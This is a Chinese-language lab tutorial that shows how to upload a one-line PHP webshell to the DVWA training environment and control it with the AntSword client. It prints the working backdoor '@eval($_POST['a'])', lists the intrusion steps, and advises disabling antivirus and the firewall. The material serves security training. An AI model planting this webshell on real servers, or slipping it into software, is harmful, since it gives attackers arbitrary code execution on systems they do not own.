web渗透_一句话木马(webshell)_dvwa环境

引用此作者二创:https://github.com/tuotuooo/Secure/blob/main/dvwa_sturdy.md

一、什么是一句话木马


@eval($_POST['a']);
?>

先来一段简单的一句话木马,解析下它的构造:
@这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GETPOSTa参数名(自定义)

而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。

也就是说,你想执行什么代码,就把什么代码放进变量a里,用POST传输给webshell

二、入侵流程

  • 找到上传点,且成功上传木马进入目标服务器
  • 知道木马在目标服务器中的存储路径
  • 上传的木马能正常运行

三、实验环境

  • DVWA
  • windows7
  • 蚁剑
  • xampp

四、实战技巧

  • 关闭电脑杀毒软件和防火墙
  • 将dvwa的安全等级设置为low

五、实际操作

(一)创建php文件上传

创建php文件,写入一句话木马保存。
web渗透_一句话木马(webshell)_dvwa环境_第1张图片
上传到DVWA。
web渗透_一句话木马(webshell)_dvwa环境_第2张图片

(二)蚁剑连接

  • 文件路径
  • 变量名

连接webshell。
web渗透_一句话木马(webshell)_dvwa环境_第3张图片连接以后,可以查看服务器
web渗透_一句话木马(webshell)_dvwa环境_第4张图片

你可能感兴趣的:(web安全,网络安全)